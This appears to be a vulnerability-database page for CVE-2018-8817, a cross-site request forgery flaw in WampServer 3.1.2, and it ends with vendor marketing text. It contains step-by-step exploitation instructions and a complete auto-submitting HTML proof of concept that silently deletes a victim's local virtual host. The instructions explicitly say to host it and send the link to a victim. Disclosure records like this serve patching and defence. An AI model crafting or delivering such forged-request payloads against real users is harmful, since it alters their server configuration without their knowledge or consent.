| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2018-8817 | 25 Mar 201819:29 | – | attackerkb | |
| CVE-2018-8817 | 2 Apr 201800:00 | – | circl | |
| Wampserver Cross-Site Request Forgery Vulnerability | 26 Mar 201800:00 | – | cnvd | |
| CVE-2018-8817 | 25 Mar 201819:00 | – | cve | |
| CVE-2018-8817 | 25 Mar 201819:00 | – | cvelist | |
| WampServer 3.1.2 - Cross-Site Request Forgery | 2 Apr 201800:00 | – | exploitdb | |
| EUVD-2018-20426 | 7 Oct 202500:30 | – | euvd | |
| WampServer 3.1.2 - Cross-Site Request Forgery | 2 Apr 201800:00 | – | exploitpack | |
| CVE-2018-8817 | 25 Mar 201819:29 | – | nvd | |
| WampServer < 3.1.3 CSRF Vulnerability | 27 Mar 201800:00 | – | openvas |
WampServer 3.1.2 CSRF to add or delete any virtual hosts remotely (CVE-2018-8817)
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on internet and send the link to the victim.
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english" name="wamp_csrf" method="POST">
<input type="hidden" name="virtual_del[]" value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress VirtualHost" />
</form>
</body>
</html>
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation